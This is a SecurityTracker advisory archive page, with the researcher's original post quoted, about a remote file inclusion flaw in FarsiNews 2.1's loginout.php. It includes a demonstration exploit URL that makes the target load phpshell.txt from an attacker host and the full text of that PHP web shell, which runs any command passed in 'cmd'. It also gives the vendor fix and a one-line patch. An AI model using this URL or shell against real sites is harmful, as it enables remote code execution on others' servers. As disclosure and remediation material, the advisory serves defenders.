SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   FarsiNews Vendors:   farsinewsteam.com
FarsiNews Include File Bug in 'logout.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015554
SecurityTracker URL:  http://securitytracker.com/id/1015554
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 31 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.1 Beta 2 and prior versions
Description:   Hamid Ebadi reported a vulnerability in FarsiNews. A remote user can execute arbitrary code on the target system.

The 'logout.php' script does not properly validate user-supplied input. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?

The original advisory is available at:

http://hamid.ir/security

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (2.5), available at:

http://www.farsinewsteam.com/

Vendor URL:  www.farsinewsteam.com/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  FarsiNews 2.1 PHP Remote File Inclusion

Remote File Inclusion in  FarsiNews 2.1 and below
Credit:
The information has been provided by Hamid Ebadi
(Hamid Network Security Team) :admin@hamid.ir.
The original article can be found at :
http://hamid.ir/security


Vulnerable Systems:
    FarsiNews 2.1 Beta 2 and below

Vulnerable Code: 
The following lines in loginout.php :
require_once($cutepath."/inc/functions.inc.php");
require_once($cutepath."/data/config.php");


Exploits:
If register_globals=ON  has been marked (check
PHP.INI) we can exploit  below URL to cause it to
include external file.

The following URL will cause the server to include
external files  ( phpshell.txt ):
http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?

phpshell.txt
-------------------
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir >> Hamid Ebadi << (Hamid
Network Security Team)</h3> ");
?>
-----[EOF]--------

Workaround:
use FarsiNews 2.5 or for Unofficial Patch , simply add
the following line in  the second line of
loginout.php:

if (isset($_REQUEST["cutepath"])){ die("Patched by
Hamid Ebadi -->http://hamid.ir  ( Hamid Network
Security Team)  "); }


Signature
 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC